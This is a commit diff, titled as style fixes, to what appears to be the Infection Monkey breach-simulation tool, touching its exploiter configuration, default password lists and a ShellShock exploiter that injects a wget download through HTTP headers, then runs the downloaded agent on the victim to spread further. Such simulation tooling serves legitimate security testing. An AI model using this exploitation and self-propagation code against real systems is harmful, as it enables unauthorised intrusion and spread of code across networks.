PEP 8 changes

chaos_monkey/config.py

@@ -135,7 +135,7 @@ class Configuration(object):
     scanner_class = TcpScanner
     finger_classes = [SMBFinger, SSHFinger, PingScanner, HTTPFinger]
     exploiter_classes = [SmbExploiter, WmiExploiter, RdpExploiter, Ms08_067_Exploiter, # Windows exploits
-                         SSHExploiter, ShellShockExploiter #Linux
+                         SSHExploiter #Linux
                         ]
 
     # how many victims to look for in a single scan iteration
@@ -167,11 +167,11 @@ class Configuration(object):
     ###########################
 
     # Auto detect and scan local subnets
-    local_network_scan = True
+    local_network_scan = False
 
     range_class = FixedRange
     range_size = 1
-    range_fixed = ['']
+    range_fixed = ['10.0.1.160']
 
     # TCP Scanner
     HTTP_PORTS = [80, 8080, 443,
@@ -201,7 +201,7 @@ class Configuration(object):
     psexec_passwords = ["Password1!", "1234", "password", "12345678"]
 
     # ssh exploiter
-    ssh_users = ["root"]
+    ssh_users = ["root",'user']
     ssh_passwords = ["Password1!", "1234", "password", "12345678"]
 
     # rdp exploiter

chaos_monkey/exploit/shellshock.py

@@ -16,7 +16,6 @@ __author__ = 'danielg'
 
 LOG = logging.getLogger(__name__)
 TIMEOUT = 2
-DOWNLOAD_TIMEOUT = 60
 TEST_COMMAND = '/bin/uname -a'
 DOWNLOAD_TIMEOUT = 60  # copied from rdpgrinder
 
@@ -46,7 +45,7 @@ class ShellShockExploiter(HostExploiter):
 
         LOG.info(
             'Scanning %s, ports [%s] for vulnerable CGI pages' % (
-            host, ",".join([str(port[0]) for port in valid_ports]))
+                host, ",".join([str(port[0]) for port in valid_ports]))
         )
 
         attackable_urls = []
@@ -92,15 +91,14 @@ class ShellShockExploiter(HostExploiter):
                     LOG.debug("Error running uname machine commad on victim %r: (%s)", host, exc)
                     return False
 
-            src_path = src_path or get_target_monkey(host)
-
 
             # copy the monkey
             dropper_target_path_linux = self._config.dropper_target_path_linux
-            if (self.skip_exist) and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
+            if self.skip_exist and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
                 LOG.info("Host %s was already infected under the current configuration, done" % host)
-                return True # return already infected
+                return True  # return already infected
 
+            src_path = src_path or get_target_monkey(host)
             if not src_path:
                 LOG.info("Can't find suitable monkey executable for host %r", host)
                 return False
@@ -111,17 +109,17 @@ class ShellShockExploiter(HostExploiter):
                 LOG.debug("Exploiter ShellShock failed, http transfer creation failed.")
                 return False
 
-
             download_command = '/usr/bin/wget %s -O %s;' % (
                 http_path, dropper_target_path_linux)
 
-            download_and_run = exploit + download_command
-            resp = self.attack_page(url, header, download_and_run)
+            download = exploit + download_command
+            self.attack_page(url, header, download)
 
             http_thread.join(DOWNLOAD_TIMEOUT)
             http_thread.stop()
 
-            if (http_thread.downloads != 1) or ('ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
+            if (http_thread.downloads != 1) or (
+                'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
                 LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
                 continue
 
@@ -134,12 +132,12 @@ class ShellShockExploiter(HostExploiter):
             cmdline = "%s %s" % (dropper_target_path_linux, MONKEY_ARG)
             cmdline += build_monkey_commandline(host, depth - 1) + ' & '
             run_path = exploit + cmdline
-            resp = self.attack_page(url, header, run_path)
+            self.attack_page(url, header, run_path)
 
             LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
                      self._config.dropper_target_path_linux, host, cmdline)
 
-            if not (self.check_remote_file_exists(url,header,exploit,self._config.monkey_log_path_linux)):
+            if not (self.check_remote_file_exists(url, header, exploit, self._config.monkey_log_path_linux)):
                 LOG.info("Failed running the monkey, log file does not exist")
                 continue
 
@@ -206,7 +204,7 @@ class ShellShockExploiter(HostExploiter):
         return urls
 
     @staticmethod
-    def report_vuln_shellshock(host,url):
+    def report_vuln_shellshock(host, url):
         from control import ControlClient
         ControlClient.send_telemetry('exploit', {'result': False, 'machine': host.__dict__,
                                                  'exploiter': ShellShockExploiter.__name__,

chaos_monkey/exploit/tools.py

@@ -425,4 +425,5 @@ def report_failed_login(exploiter, machine, user, password):
     from control import ControlClient
     ControlClient.send_telemetry('exploit', {'result': False, 'machine': machine.__dict__,
                                              'exploiter': exploiter.__class__.__name__,
-                                             'user':user,'password':password})
+                                             'user':user,'password':password})
+